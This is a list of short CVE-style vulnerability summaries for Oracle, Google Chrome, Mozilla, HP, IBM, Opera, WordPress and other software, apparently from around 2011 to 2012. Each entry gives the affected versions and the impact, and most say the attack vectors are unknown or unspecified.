Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to Network Status Monitor (statd).
Unspecified vulnerability in the Oracle Agile Product Supplier Collaboration for Process component in Oracle Supply Chain Products Suite 5.2.2, 6.0.0.2, 6.0.0.3, and 6.0.0.4 allows remote attackers to affect confidentiality via unknown vectors related to Supplier Portal.
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect availability via unknown vectors related to Web Services Security.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 8.9 allows remote authenticated users to affect confidentiality via unknown vectors related to eDevelopment.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.0 and 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 8.9 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to eProfile.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Candidate Gateway.
Unspecified vulnerability in the Siebel Core - UIF Server component in Oracle Siebel CRM 8.0.0 and 8.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to User Interface.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, 7, 6 Update 27 and earlier, and 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.49, 8.50, and 8.51 allows remote authenticated users to affect integrity via unknown vectors related to Personalization.
Unspecified vulnerability in the Siebel Core - UIF Client component in Oracle Siebel CRM 8.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to User Interface.
Unspecified vulnerability in the Oracle OpenSSO component in Oracle Sun Products Suite 8.0 allows remote attackers to affect availability via unknown vectors related to Authentication.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Solaris 10 and 11 Express allows local users to affect integrity and availability via unknown vectors related to Process File System (procfs).
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.2 allows remote authenticated users to affect integrity and availability via unknown vectors related to Privileged Account.
Unspecified vulnerability in the Oracle Business Intelligence Enterprise Edition component in Oracle Fusion Middleware 11.1.1.3.0 and 11.1.1.5.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to BI Platform Security.
Unspecified vulnerability in the Oracle Communications Unified component in Oracle Sun Products Suite 7.0 allows remote authenticated users to affect integrity via unknown vectors related to Messaging Server.
Unspecified vulnerability in the Oracle OpenSSO component in Oracle Sun Products Suite 7.1 and 8.0 allows remote attackers to affect integrity via unknown vectors related to Authentication.
Untrusted search path vulnerability in eSignal 10.6.2425.1208, and possibly other versions, allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse JRS_UT.dll that is located in the same folder as a .quo (QUOTE) file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Google Chrome before 14.0.835.125 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Google Chrome before 14.0.835.157 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in WebsiteBaker before 2.8, as used in LEPTON and possibly other products, allows remote attackers to inject arbitrary web script or HTML via unknown vectors, a different vulnerability than CVE-2006-2307.
Cross-site request forgery (CSRF) vulnerability in Phorum before 5.2.16 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Cisco Identity Services Engine (ISE) before 1.0.4.MR2 has default Oracle database credentials, which allows remote attackers to modify settings or perform unspecified other administrative actions via unknown vectors, aka Bug ID CSCts59135.
The SMB File Server component in Apple Mac OS X 10.7 before 10.7.2 does not prevent all guest users from accessing the share point record of a guest-restricted folder, which allows remote attackers to bypass intended browsing restrictions by leveraging access to the nobody account.
Directory traversal vulnerability in pure-FTPd 1.0.22 and possibly other versions, when running on SUSE Linux Enterprise Server and possibly other operating systems, when the Netware OES remote server feature is enabled, allows local users to overwrite arbitrary files via unknown vectors.
Unspecified vulnerability in the SMTP service implementation in HP TCP/IP Services 5.6 and 5.7 for OpenVMS allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the POP and IMAP service implementations in HP TCP/IP Services 5.6 and 5.7 for OpenVMS allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1210.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1209.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1208.
Unspecified vulnerability in HP-UX Containers (formerly HP-UX Secure Resource Partitions (SRP)) A.03.00, A.03.00.002, and A.03.01, when running with patch PHKL_42310, allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1296.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1229.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1228.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1227.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1226.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1225.
Unspecified vulnerability in HP Data Protector Notebook Extension 6.20 and Data Protector for Personal Computers 7.0 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1222.
Unspecified vulnerability in HP Onboard Administrator (OA) 3.21 through 3.31 allows remote attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in the Management Console in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.9 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.9 has unknown impact and attack vectors, aka APAR IV03050.
Unspecified vulnerability in the Management Console in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.9 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.9 has unknown impact and attack vectors, aka APAR IV03048.
Unspecified vulnerability in the Runtime in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.9 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.9 has unknown impact and attack vectors.
wp-includes/taxonomy.php in WordPress 3.1 before 3.1.3 and 3.2 before Beta 2 has unknown impact and attack vectors related to "Taxonomy query hardening," possibly involving SQL injection.
The file upload functionality in WordPress 3.1 before 3.1.3 and 3.2 before Beta 2, when running "on hosts with dangerous security settings," has unknown impact and attack vectors, possibly related to dangerous filenames.
Unspecified vulnerability in WordPress 3.1 before 3.1.3 and 3.2 before Beta 2 has unknown impact and attack vectors related to "Various security hardening."
IBM InfoSphere Information Server 8.5 and 8.5.0.1 on Unix and Linux, as used in IBM InfoSphere DataStage 8.5 and 8.5.0.1 and other products, assigns incorrect ownership to unspecified files, which allows local users to gain privileges via unknown vectors.
IBM InfoSphere Information Server 8.5 and 8.5.0.1 on Unix and Linux, as used in IBM InfoSphere DataStage 8.5 and 8.5.0.1 and other products, uses weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in WordPress 3.1 before 3.1.3 and 3.2 before Beta 2 has unknown impact and attack vectors related to "Media security."
Multiple buffer overflows in the PDF functionality in Google Chrome before 19.0.1084.52 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger unknown function calls.
The PDF functionality in Google Chrome before 19.0.1084.52 does not properly perform a cast of an unspecified variable during handling of color spaces, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Google Chrome before 19.0.1084.52 on Linux does not properly perform a cast of an unspecified variable, which allows remote attackers to cause a denial of service or possibly have unknown other impact by leveraging an error in the GTK implementation of the UI.
Google Chrome before 19.0.1084.52 does not properly implement JavaScript bindings for plug-ins, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Off-by-one error in libxml2, as used in Google Chrome before 19.0.1084.46 and other products, allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 19.0.1084.46 on Linux does not properly mitigate an unspecified flaw in an NVIDIA driver, which has unknown impact and attack vectors.  NOTE: see CVE-2012-3105 for the related MFSA 2012-34 issue in Mozilla products.
The OGG container in Google Chrome before 19.0.1084.46 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write.
The regex implementation in Google V8, as used in Google Chrome before 19.0.1084.46, allows remote attackers to cause a denial of service (invalid write operation) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the IndexedDB implementation in Google Chrome before 19.0.1084.46 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the HTMLMediaElement implementation in Google Chrome before 18.0.1025.151 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Skia, as used in Google Chrome before 18.0.1025.142, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
The WebGL implementation in Google Chrome before 17.0.963.83 does not properly handle CANVAS elements, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 17.0.963.65 does not properly perform casts of unspecified variables during the splitting of anonymous blocks, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Google Chrome before 17.0.963.65 does not properly perform a cast of an unspecified variable during handling of line boxes, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Buffer overflow in Skia, as used in Google Chrome before 17.0.963.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the element wrapper in Google V8, as used in Google Chrome before 17.0.963.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 17.0.963.56 does not properly perform a cast of an unspecified variable during handling of columns, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation.
Unspecified vulnerability in the Native Client validator implementation in Google Chrome before 17.0.963.56 has unknown impact and remote attack vectors.
Multiple integer overflows in the PDF codecs in Google Chrome before 17.0.963.56 allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 6, Thunderbird before 7.0, and SeaMonkey before 2.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the plugin API in Mozilla Firefox 3.6.x before 3.6.23 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.20, Thunderbird 2.x and 3.x before 3.1.12, SeaMonkey 1.x and 2.x, and possibly other products allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
An unspecified ActiveX control in the browser plugin in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.0 through 2.1.5 allows remote attackers to execute arbitrary code via unknown vectors, related to an out-of-bounds condition.
Unspecified vulnerability in an ActiveX control in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.0 through 2.1.5 allows remote attackers to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in IBM Lotus Symphony 3 before FP3 have unknown impact and attack vectors, related to "critical security vulnerability issues."
Google Chrome before 14.0.835.202 does not properly consider object lifetimes and thread safety during the handling of audio nodes, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 14.0.835.202 does not properly handle SVG text, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "stale font."
Google Chrome before 14.0.835.163 does not properly handle Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale node."
Off-by-one error in Google V8, as used in Google Chrome before 14.0.835.163, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The PDF implementation in Google Chrome before 13.0.782.215 on Linux does not properly use the memset library function, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google V8, as used in Google Chrome before 14.0.835.163, does not properly implement script object wrappers, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Google V8, as used in Google Chrome before 13.0.782.215, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write.
Use-after-free vulnerability in Skia, as used in Google Chrome before 13.0.782.107, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The International Components for Unicode (ICU) functionality in Google Chrome before 13.0.782.107 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write.
Buffer overflow in the inspector serialization functionality in Google Chrome before 13.0.782.107 allows user-assisted remote attackers to have an unspecified impact via unknown vectors.
Unspecified vulnerability in Kernel/Modules/AdminPackageManager.pm in OTRS-Core in Open Ticket Request System (OTRS) 2.x before 2.4.11 and 3.x before 3.0.10 allows remote authenticated administrators to read arbitrary files via unknown vectors.
Unspecified vulnerability in IBM Rational DOORS Web Access 1.4.x before 1.4.0.4 has unknown impact and remote attack vectors related to the "server error response."
Unspecified vulnerability in Megalith 12th edition through 27th edition allows remote attackers to gain administrative privileges via unknown vectors.
Unspecified vulnerability in Check Point Multi-Domain Management / Provider-1 NGX R65, R70, R71, and R75, and SmartCenter during installation on non-Windows machines, allows local users on the MDS system to overwrite arbitrary files via unknown vectors.
Unspecified vulnerability in ZfHSrvr.exe in Novell ZENworks Handheld Management (ZHM) 7 allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-2655.
Unspecified vulnerability in ZfHSrvr.exe in Novell ZENworks Handheld Management (ZHM) 7 allows remote attackers to execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-2656.
Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by games on zylom.com.
Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by futura-sciences.com, seoptimise.com, and mitosyfraudes.org.
Unspecified vulnerability in Opera before 11.10 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by a certain Tomato Firmware page.
Unspecified vulnerability in Opera before 11.11 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by www.falk.de.
Unspecified vulnerability in the DOM implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by live.com.
Unspecified vulnerability in the SVG BiDi implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash or hang) via unknown vectors.
Unspecified vulnerability in the Web Workers implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (memory consumption) via unknown content on a web page, as demonstrated by test262.ecmascript.org.
Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application hang) via unknown content on a web page, as demonstrated by domiteca.com.
Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by progorod.ru.
Unspecified vulnerability in Opera before 11.50 has unknown impact and attack vectors, related to a "moderately severe issue."
Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011.
Unspecified vulnerability in HP Business Service Automation (BSA) Essentials 2.01 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability on HP NonStop Servers with software H06.x through H06.23.00 and J06.x through J06.12.00, when Samba is used, allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP OpenView Performance Insight 5.3, 5.31, 5.4, 5.41, 5.41.001, and 5.41.002 allows remote attackers to obtain access via unknown vectors.
Unspecified vulnerability in the Media Management Daemon (mmd) in HP Data Protector 6.11 and earlier allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the dynamic loader in HP HP-UX B.11.11, B.11.23, and B.11.31 allows local users to gain privileges or cause a denial of service via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.18 and Thunderbird before 3.1.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 5.0 and Thunderbird through 3.1.11 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.6.18 and 4.x through 4.0.1, and Thunderbird before 3.1.11, allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.6.x before 3.6.18 and Thunderbird before 3.1.11 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-2364.
Unspecified vulnerability in the browser engine in Mozilla Firefox 3.6.x before 3.6.18 and Thunderbird before 3.1.11 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-2365.
Google Chrome before 13.0.782.107 does not properly track line boxes during rendering, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
The HTML parser in Google Chrome before 12.0.742.112 does not properly address "lifetime and re-entrancy issues," which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google V8, as used in Google Chrome before 12.0.742.112, performs an incorrect bounds check, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 12.0.742.112 does not properly handle Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in the Oracle Communications Unified component in Oracle Sun Products Suite 7.0 allows local users to affect confidentiality via unknown vectors related to Delegated Administrator.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Services.
Unspecified vulnerability in the Siebel Apps - Marketing component in Oracle Siebel CRM 8.0.0 allows remote attackers to affect integrity via unknown vectors related to Email Marketing.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.49, 8.50, and 8.51 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors related to JavaServer Pages.
Unspecified vulnerability in the Oracle Waveset component in Oracle Sun Products Suite 8.1.0 and 8.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to User Administration.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Online Help.
Unspecified vulnerability in Oracle Linux 4 and 5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to "Oracle validated."
Unspecified vulnerability in Oracle VM VirtualBox 4.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Attachments / File Upload.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Single Sign On.
Unspecified vulnerability in Oracle VM VirtualBox 3.0, 3.1, 3.2, and 4.0 through 4.0.8 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Guest Additions for Windows.
Unspecified vulnerability in Oracle Solaris Cluster 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Data Service for WebLogic Server.
Unspecified vulnerability in Oracle Solaris 11 Express allows local users to affect availability via unknown vectors related to Zones.
Unspecified vulnerability in Oracle Solaris 9 and 11 Express allows local users to affect confidentiality and integrity via unknown vectors related to xscreensaver.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect confidentiality via unknown vectors related to Trusted Extensions.
Unspecified vulnerability in Oracle Solaris 10, and 11 Express allows local users to affect availability via unknown vectors related to Kernel/sockfs.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect integrity and availability via unknown vectors related to LiveUpgrade.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows remote attackers to affect availability via unknown vectors related to fingerd.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Installer.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.0 Bundle #17 allows remote authenticated users to affect confidentiality via unknown vectors related to ePerformance.
Unspecified vulnerability in the PeopleSoft Enterprise FMS component in Oracle PeopleSoft Products 9.0 Bundle #36 and 9.1 Bundle #13 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Payables.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50.20 and 8.51.11 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 8.9 Update 2011-D allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Global Payroll Core.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.49.31, 8.50.20, and 8.51.11 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2011-2274.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1, Bundle, and #6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 8.9, Bundle, #24, 9.0, Bundle, #17, 9.1, Bundle, and #6 allows remote authenticated users to affect confidentiality via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in the PeopleSoft Enterprise SCM component in Oracle PeopleSoft Products 9.0 Bundle #36 and 9.1 Bundle #13 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Purchasing.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.49.31, 8.50.20, and 8.51.11 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.49.31, 8.50.20, and 8.51.11 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2011-2280.
Unspecified vulnerability in the Agile Core Technology component in Oracle Supply Chain Products Suite 9.3.0.3 and 9.3.1.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Search.
Unspecified vulnerability in the PeopleSoft Enterprise FSCM component in Oracle PeopleSoft Products 9.0, Bundle, #36, 9.1, Bundle, and #13 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to eProcurement.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote authenticated users to affect integrity via unknown vectors related to Attachments / File Upload.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.2.0 and 8.3.5.0 allows context-dependent attackers to affect availability via unknown vectors related to Outside In Filters.
Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.2.0 and 8.3.5.0 allows context-dependent attackers to affect confidentiality, integrity, and availability via unknown vectors related to Outside In Filters.  NOTE: the previous information was obtained from the July 2011 CPU.  Oracle has not commented on claims from a reliable third party that this is a stack-based buffer overflow in the imcdr2.flt library for the CorelDRAW parser.
Unspecified vulnerability in Sun Integrated Lights Out Manager in Oracle SysFW 8.0.3.b or earlier for various Oracle SPARC T3, SPARC Netra T3, Sun Blade, and Sun Fire servers allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.3.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2011-2252.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Products Suite 2.1.1 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 Express allows local users to affect confidentiality, integrity, and availability via unknown vectors related to rksh.
Unspecified vulnerability in the Database Target Type Menus component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6, 10.2.0.5, and 11.1.0.1; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle WebLogic Portal component in Oracle Fusion Middleware 9.2.3.0, 10.0.1.0, 10.2.1.0, and 10.3.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.3.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2011-2261.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.3.0.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise FIN component in Oracle PeopleSoft Products 9.0 Bundle #36 and 9.1 Bundle #13 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Receivables.
Unspecified vulnerability in the Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Financials.
Unspecified vulnerability in the Security Framework component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Enterprise Manager Grid Control 10.1.0.6, 10.2.0.5, and 11.1.0.1; allows remote attackers to affect confidentiality and integrity via unknown vectors related to Authentication.
Unspecified vulnerability in the Oracle Business Intelligence Enterprise Edition component in Oracle Fusion Middleware 10.1.3.4.1 and 11.1.1.3 allows remote attackers to affect availability via unknown vectors related to Analytics Server.
Unspecified vulnerability in the Oracle Universal Installer component in Oracle Database Server 10.1.0.5 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the XML Developer Kit component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 11.1.0.7, and 11.2.0.1, and Oracle Fusion Middleware 10.1.3.5, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the XML Developer Kit component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1, Oracle Fusion Middleware 10.1.3.5, allows remote attackers to affect availability via unknown vectors.
